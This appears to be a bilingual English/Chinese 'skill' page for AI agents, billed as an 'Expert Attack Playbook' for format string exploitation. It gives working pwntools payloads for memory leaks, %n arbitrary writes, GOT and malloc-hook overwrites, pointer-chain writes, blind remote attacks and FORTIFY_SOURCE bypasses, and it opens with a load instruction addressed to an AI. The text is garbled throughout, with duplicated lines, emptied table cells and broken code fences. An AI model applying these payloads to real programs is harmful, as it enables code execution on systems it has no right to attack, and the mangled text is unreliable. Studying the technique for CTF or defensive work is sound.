format-string-exploitation
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseSKILL: Format String Exploitation — Expert Attack Playbook
SKILL: Format String Exploitation — 高级攻击手册
AI LOAD INSTRUCTION: Expert format string techniques. Covers stack reading, arbitrary write via %n, GOT overwrite, __malloc_hook overwrite, pointer chain exploitation, blind format string, FORTIFY_SOURCE bypass, 64-bit null byte handling, and pwntools automation. Distilled from ctf-wiki fmtstr, CTF patterns, and real-world scenarios. Base models often miscalculate positional parameter offsets or forget 64-bit address placement after format string.
AI加载说明:高级格式化字符串技术,涵盖栈读取、%n任意写入、GOT覆写、__malloc_hook覆写、指针链利用、盲格式化字符串攻击、FORTIFY_SOURCE绕过、64位空字节处理,以及pwntools自动化实现。内容提炼自ctf-wiki格式化字符串章节、CTF常见模式及真实场景。基础模型通常会错误计算位置参数偏移量,或者遗漏格式字符串后的64位地址放置规则。
0. RELATED ROUTING
0. 相关关联技能
- stack-overflow-and-rop — combine format string leak with stack overflow for full exploit
- binary-protection-bypass — format string is the primary canary/PIE/ASLR leak method
- arbitrary-write-to-rce — convert format string write primitive to code execution targets
- heap-exploitation — heap address leak via format string for heap exploitation
- stack-overflow-and-rop — 结合格式化字符串泄露与栈溢出实现完整利用
- binary-protection-bypass — 格式化字符串是泄露canary/PIE/ASLR的主要方法
- arbitrary-write-to-rce — 将格式化字符串写入原语转换为代码执行能力
- heap-exploitation — 通过格式化字符串泄露堆地址用于堆漏洞利用
1. VULNERABILITY IDENTIFICATION
1. 漏洞识别
Vulnerable Pattern
漏洞模式
c
printf(user_input); // VULNERABLE: user controls format string
fprintf(fp, user_input); // VULNERABLE
sprintf(buf, user_input); // VULNERABLE
snprintf(buf, sz, user_input); // VULNERABLE
printf("%s", user_input); // SAFE: format string is fixedc
printf(user_input); // VULNERABLE: user controls format string
fprintf(fp, user_input); // VULNERABLE
sprintf(buf, user_input); // VULNERABLE
snprintf(buf, sz, user_input); // VULNERABLE
printf("%s", user_input); // SAFE: format string is fixedQuick Test
快速测试
Input: AAAA%p%p%p%p%p%p%p%p
If output shows stack values (hex addresses): format string confirmed
Look for 0x4141414141414141 in output to find your input offsetInput: AAAA%p%p%p%p%p%p%p%p
If output shows stack values (hex addresses): format string confirmed
Look for 0x4141414141414141 in output to find your input offset2. READING MEMORY
2. 内存读取
Stack Leak (%p)
栈泄露 (%p)
| Format | Action | Use |
|---|---|---|
| Print next stack value as pointer | Sequential stack dump |
| Print N-th parameter as pointer | Direct positional access |
| Same as %p but explicit hex (64-bit) | Portable |
| Dereference N-th parameter as string pointer | Read memory at pointer value |
| 格式符 | 作用 | 用途 |
|---|---|---|
| 将下一个栈值作为指针打印 | 连续栈转储 |
| 打印第N个参数作为指针 | 直接位置访问 |
| 与%p功能相同,但显式输出64位十六进制值 | 可移植 |
| 将第N个参数作为字符串指针解引用 | 读取指针指向的内存内容 |
Finding Your Input Offset
定位输入偏移
python
undefinedpython
undefinedSend: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
Send: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
Output: AAAAAAAA.0x7ffd12340000.0x0.(nil).0x7f1234567890.0x4141414141414141...
Output: AAAAAAAA.0x7ffd12340000.0x0.(nil).0x7f1234567890.0x4141414141414141...
↑ offset = 6 (example)
↑ offset = 6 (example)
Or automated:
Or automated:
for i in range(1, 30):
io.sendline(f'AAAA%{i}$p')
if '0x41414141' in io.recvline():
print(f'Offset = {i}')
break
undefinedfor i in range(1, 30):
io.sendline(f'AAAA%{i}$p')
if '0x41414141' in io.recvline():
print(f'Offset = {i}')
break
undefinedLeaking Specific Values
泄露特定值
| Target | Method | Stack Position |
|---|---|---|
| Canary | | Typically at offset buf_size/8 + few |
| Saved RBP | | Leaks stack address → stack base |
| Return address | | Leaks .text address (PIE base = leak & ~0xfff - offset) |
| Libc address | | libc base = leak - offset |
| 目标 | 方法 | 栈位置 |
|---|---|---|
| Canary | | 通常位于buf_size/8 + 少量偏移处 |
| Saved RBP | | 泄露栈地址 → 栈基址 |
| Return address | | 泄露.text段地址(PIE基址 = 泄露值 & ~0xfff - 偏移) |
| Libc地址 | | libc基址 = 泄露值 - 偏移 |
Reading Arbitrary Address (%s)
读取任意地址 (%s)
undefinedundefined32-bit: place address at start of format string
32-bit: place address at start of format string
payload = p32(target_addr) + b'%N$s' # N = offset where target_addr appears on stack
payload = p32(target_addr) + b'%N$s' # N = offset where target_addr appears on stack
64-bit: address contains null bytes → place AFTER format specifiers
64-bit: address contains null bytes → place AFTER format specifiers
payload = b'%8$sAAAA' + p64(target_addr) # %8$s reads from offset 8 where address is
---payload = b'%8$sAAAA' + p64(target_addr) # %8$s reads from offset 8 where address is
---3. WRITING MEMORY (%n)
3. 内存写入 (%n)
Write Specifiers
写入说明符
| Specifier | Bytes Written | Width |
|---|---|---|
| 4 bytes (int) | Characters printed so far |
| 2 bytes (short) | Characters printed so far (mod 0x10000) |
| 1 byte (char) | Characters printed so far (mod 0x100) |
| 8 bytes (long) | Characters printed so far |
| 说明符 | 写入字节数 | 宽度 |
|---|---|---|
| 4 bytes (int) | 到目前为止打印的字符数 |
| 2 bytes (short) | 到目前为止打印的字符数(mod 0x10000) |
| 1 byte (char) | 到目前为止打印的字符数(mod 0x100) |
| 8 bytes (long) | 到目前为止打印的字符数 |
Arbitrary Write Technique
任意写入技术
Goal: Write value to address .
VA32-bit (address on stack directly):
python
undefined目标:将值 写入地址 。
VA32位(地址直接放在栈上):
python
undefinedWrite 2 bytes at a time using %hn
Write 2 bytes at a time using %hn
Place target addresses in format string (they'll be on stack)
Place target addresses in format string (they'll be on stack)
payload = p32(target_addr) # for low 2 bytes
payload += p32(target_addr + 2) # for high 2 bytes
payload = p32(target_addr) # for low 2 bytes
payload += p32(target_addr + 2) # for high 2 bytes
Calculate padding for each %hn write
Calculate padding for each %hn write
low = value & 0xffff
high = (value >> 16) & 0xffff
payload += f'%{low - 8}c%{offset}$hn'.encode()
payload += f'%{(high - low) & 0xffff}c%{offset+1}$hn'.encode()
**64-bit** (address AFTER format string):
```pythonlow = value & 0xffff
high = (value >> 16) & 0xffff
payload += f'%{low - 8}c%{offset}$hn'.encode()
payload += f'%{(high - low) & 0xffff}c%{offset+1}$hn'.encode()
**64位**(地址放在格式字符串之后):
```pythonAddresses contain null bytes (0x00007fXXXXXXXX) which terminate string
Addresses contain null bytes (0x00007fXXXXXXXX) which terminate string
Solution: place addresses AFTER the format specifiers
Solution: place addresses AFTER the format specifiers
Step 1: format string portion (no null bytes)
Step 1: format string portion (no null bytes)
fmt = b'%Xc%N$hn%Yc%M$hn'
fmt = b'%Xc%N$hn%Yc%M$hn'
Step 2: pad to 8-byte alignment
Step 2: pad to 8-byte alignment
fmt = fmt.ljust(align, b'A')
fmt = fmt.ljust(align, b'A')
Step 3: append target addresses
Step 3: append target addresses
fmt += p64(target_addr)
fmt += p64(target_addr + 2)
undefinedfmt += p64(target_addr)
fmt += p64(target_addr + 2)
undefinedByte-by-Byte Write with %hhn
使用%hhn逐字节写入
Write one byte at a time for precision (6 writes for full 48-bit address on 64-bit):
python
writes = {}
for i in range(6):
byte_val = (value >> (i * 8)) & 0xff
writes[target_addr + i] = byte_val每次写入1字节保证精度(64位下完整48位地址需要6次写入):
python
writes = {}
for i in range(6):
byte_val = (value >> (i * 8)) & 0xff
writes[target_addr + i] = byte_valpwntools handles the math:
pwntools handles the math:
from pwn import fmtstr_payload
payload = fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
---from pwn import fmtstr_payload
payload = fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
---4. PWNTOOLS fmtstr_payload()
4. PWNTOLS fmtstr_payload()
python
from pwn import *python
from pwn import *Overwrite GOT entry with target address
Overwrite GOT entry with target address
payload = fmtstr_payload(
offset, # stack offset where input appears
{elf.got['printf']: libc.symbols['system']}, # {addr: value}
numbwritten=0, # bytes already output before our input
write_size='short' # 'byte', 'short', or 'int'
)
payload = fmtstr_payload(
offset, # stack offset where input appears
{elf.got['printf']: libc.symbols['system']}, # {addr: value}
numbwritten=0, # bytes already output before our input
write_size='short' # 'byte', 'short', or 'int'
)
For 64-bit with addresses after format string:
For 64-bit with addresses after format string:
fmtstr_payload handles this automatically
fmtstr_payload handles this automatically
undefinedundefinedFmtStr Class (Interactive Exploitation)
FmtStr类(交互式利用)
python
from pwn import *
def send_payload(payload):
io.sendline(payload)
return io.recvline()
fmt = FmtStr(execute_fmt=send_payload)python
from pwn import *
def send_payload(payload):
io.sendline(payload)
return io.recvline()
fmt = FmtStr(execute_fmt=send_payload)fmt.offset is auto-detected
fmt.offset is auto-detected
fmt.write(elf.got['printf'], libc.symbols['system'])
fmt.execute_writes()
---fmt.write(elf.got['printf'], libc.symbols['system'])
fmt.execute_writes()
---5. GOT OVERWRITE VIA FORMAT STRING
5. 通过格式化字符串覆写GOT
Common Targets
常见目标
| Overwrite | With | Trigger |
|---|---|---|
| | Next |
| | If |
| | If |
| | If |
| Controlled addr | Bypass canary check entirely |
| | Create infinite loop for multi-shot exploit |
| 覆写目标 | 替换为 | 触发方式 |
|---|---|---|
| | 下一次调用 |
| | 当程序调用 |
| | 当程序调用 |
| | 当程序调用 |
| 可控地址 | 完全绕过canary检查 |
| | 创建无限循环实现多轮利用 |
Hook Targets (glibc < 2.34)
Hook目标(glibc < 2.34)
| Target | One-gadget | Trigger |
|---|---|---|
| one_gadget addr | Any |
| | Trigger |
| 目标 | 替换为 | 触发方式 |
|---|---|---|
| one_gadget地址 | 任意使用大格式的 |
| | 触发 |
6. STACK POINTER CHAIN EXPLOITATION
6. 栈指针链利用
When format string is not directly on the stack (e.g., stored in a heap buffer referenced by stack pointer), use pointer chains on the stack to achieve arbitrary write.
当格式化字符串不直接存储在栈上时(例如存储在栈指针引用的堆缓冲区中),使用栈上的指针链实现任意写入。
Two-Stage Write
两阶段写入
Stack:
[offset A] → ptr_X (stack address pointing to another stack address)
[offset B] → ptr_Y (target of ptr_X)
Stage 1: Use %A$hn to modify ptr_X's low bytes → ptr_X now points to target_addr
Stage 2: Use %B$n to write through the modified ptr_X → writes to target_addrThis requires finding existing pointer chains on the stack (e.g., saved frame pointers forming a chain: rbp → prev_rbp → prev_prev_rbp).
Stack:
[offset A] → ptr_X (stack address pointing to another stack address)
[offset B] → ptr_Y (target of ptr_X)
Stage 1: Use %A$hn to modify ptr_X's low bytes → ptr_X now points to target_addr
Stage 2: Use %B$n to write through the modified ptr_X → writes to target_addr该方法需要在栈上找到现有指针链(例如保存的帧指针形成的链:rbp → prev_rbp → prev_prev_rbp)。
Finding Pointer Chains
查找指针链
python
undefinedpython
undefinedLeak stack with %p, look for:
Leak stack with %p, look for:
1. Stack address A at offset N that points to another stack address B
1. Stack address A at offset N that points to another stack address B
2. Stack address B at offset M
2. Stack address B at offset M
Modify value at A (using %N$hn) to change where B points
Modify value at A (using %N$hn) to change where B points
Then write through B (using %M$hn) to target
Then write through B (using %M$hn) to target
---
---7. BLIND FORMAT STRING
7. 盲打格式化字符串
Remote service, no binary, no source — exploit format string blind.
远程服务,无二进制文件,无源码——盲打利用格式化字符串漏洞。
Methodology
方法流程
| Step | Action | Purpose |
|---|---|---|
| 1 | Send | Dump stack, identify address patterns |
| 2 | Identify offsets | Find libc addrs (0x7f...), stack addrs (0x7ff...), code addrs |
| 3 | Find input offset | Send |
| 4 | Identify binary base | Code addresses reveal PIE base (or fixed base if no PIE) |
| 5 | Leak GOT entries | If binary base known, read GOT via |
| 6 | Calculate libc base | GOT value - libc symbol offset |
| 7 | Overwrite GOT | |
| 步骤 | 操作 | 目的 |
|---|---|---|
| 1 | 发送50个 | 转储栈内容,识别地址模式 |
| 2 | 识别偏移 | 找出libc地址(0x7f开头)、栈地址(0x7ff开头)、代码地址 |
| 3 | 定位输入偏移 | 遍历N=1..50发送 |
| 4 | 确定二进制基址 | 代码地址可计算出PIE基址(无PIE则为固定基址) |
| 5 | 泄露GOT条目 | 已知二进制基址后,通过带GOT地址的 |
| 6 | 计算libc基址 | GOT值 - libc符号偏移 |
| 7 | 覆写GOT | 使用 |
8. FORTIFY_SOURCE BYPASS
8. FORTIFY_SOURCE绕过
FORTIFY_SOURCE-D_FORTIFY_SOURCE=2printf__printf_chk%N$nFORTIFY_SOURCE-D_FORTIFY_SOURCE=2printf__printf_chk%N$nBypass Techniques
绕过技术
| Method | Detail |
|---|---|
Use | Print exact byte count, |
| Stack-based exploit | If format string is on stack, use non-positional |
| Heap overflow instead | FORTIFY doesn't protect heap — combine with heap bug |
| Return-to-printf | ROP to call unfortified |
| 方法 | 细节 |
|---|---|
顺序使用 | 打印精确字节数后调用 |
| 基于栈的利用 | 如果格式字符串在栈上,结合栈位置控制使用非位置参数的 |
| 改用堆溢出 | FORTIFY不保护堆 — 结合堆漏洞利用 |
| Return-to-printf | ROP调用未加固的 |
9. 64-BIT CONSIDERATIONS
9. 64位注意事项
| Challenge | Solution |
|---|---|
Addresses contain | Place addresses AFTER format specifiers, pad to alignment |
| Address width: 6 significant bytes | Write 3 × |
| Larger stack offset range | Input may be at offset 6+ due to 6 register args saved |
| 48-bit address space | Only bottom 48 bits of 64-bit used |
| 挑战 | 解决方案 |
|---|---|
地址包含 | 将地址放在格式说明符之后,填充到对齐长度 |
| 地址宽度:6个有效字节 | 写入3次 |
| 栈偏移范围更大 | 由于6个寄存器参数入栈,输入偏移通常从6开始 |
| 48位地址空间 | 64位地址仅使用低48位 |
Layout Template (64-bit)
布局模板(64位)
[format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]...
← no null bytes here → ← null bytes OK (after fmt) →[format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]...
← no null bytes here → ← null bytes OK (after fmt) →10. DECISION TREE
10. 决策树
Format string vulnerability confirmed (printf(user_input))
├── FORTIFY_SOURCE enabled? (__printf_chk)
│ ├── YES → positional %n blocked
│ │ ├── Sequential %n possible? → non-positional write
│ │ └── Combine with another primitive (heap, ROP)
│ └── NO → full positional %n available
├── What do you need first?
│ ├── Leak canary → %N$p at canary stack offset
│ ├── Leak PIE base → %N$p at return address offset → base = leak - known_offset
│ ├── Leak libc base → %N$p at __libc_start_main return on stack
│ ├── Leak heap base → %N$p at heap pointer on stack
│ └── Leak specific address → %N$s with target address on stack
├── Architecture?
│ ├── 32-bit → addresses at start of format string
│ └── 64-bit → addresses after format string (null byte issue)
├── Write target?
│ ├── Partial RELRO → GOT overwrite (printf→system, atoi→system)
│ ├── Full RELRO → __malloc_hook or __free_hook (pre-2.34)
│ ├── Full RELRO + glibc ≥ 2.34 → target _IO_FILE, exit_funcs, TLS_dtor_list
│ └── Stack return address → direct overwrite (if ASLR bypassed)
├── Single-shot or multi-shot?
│ ├── Loop (multi-shot) → overwrite GOT entry incrementally, use pointer chains
│ └── One-shot → fmtstr_payload() with all writes in single payload
└── Input not on stack? (heap buffer)
└── Use stack pointer chains for indirect writes确认存在格式化字符串漏洞(printf(user_input))
├── 是否开启FORTIFY_SOURCE? (__printf_chk)
│ ├── 是 → 位置参数%n被禁用
│ │ ├── 可使用顺序%n? → 非位置参数写入
│ │ └── 结合其他原语(堆漏洞、ROP)
│ └── 否 → 可使用完整位置参数%n
├── 首先需要获取什么?
│ ├── 泄露canary → 用canary栈偏移对应的%N$p
│ ├── 泄露PIE基址 → 返回地址偏移对应的%N$p → 基址 = 泄露值 - 已知偏移
│ ├── 泄露libc基址 → 栈上__libc_start_main返回地址对应的%N$p
│ ├── 泄露堆基址 → 栈上堆指针对应的%N$p
│ └── 泄露特定地址 → 栈上放置目标地址,使用%N$s
├── 架构?
│ ├── 32位 → 地址放在格式字符串开头
│ └── 64位 → 地址放在格式字符串之后(解决空字节问题)
├── 写入目标?
│ ├── 部分RELRO → GOT覆写(printf→system, atoi→system)
│ ├── 完全RELRO → __malloc_hook或__free_hook(glibc <2.34)
│ ├── 完全RELRO + glibc ≥ 2.34 → 目标_IO_FILE、exit_funcs、TLS_dtor_list
│ └── 栈返回地址 → 直接覆写(如果已绕过ASLR)
├── 单次利用还是多次利用?
│ ├── 循环(多次利用) → 增量覆写GOT条目,使用指针链
│ └── 单次利用 → fmtstr_payload()一次性构造所有写入的payload
└── 输入不在栈上?(堆缓冲区)
└── 使用栈指针链实现间接写入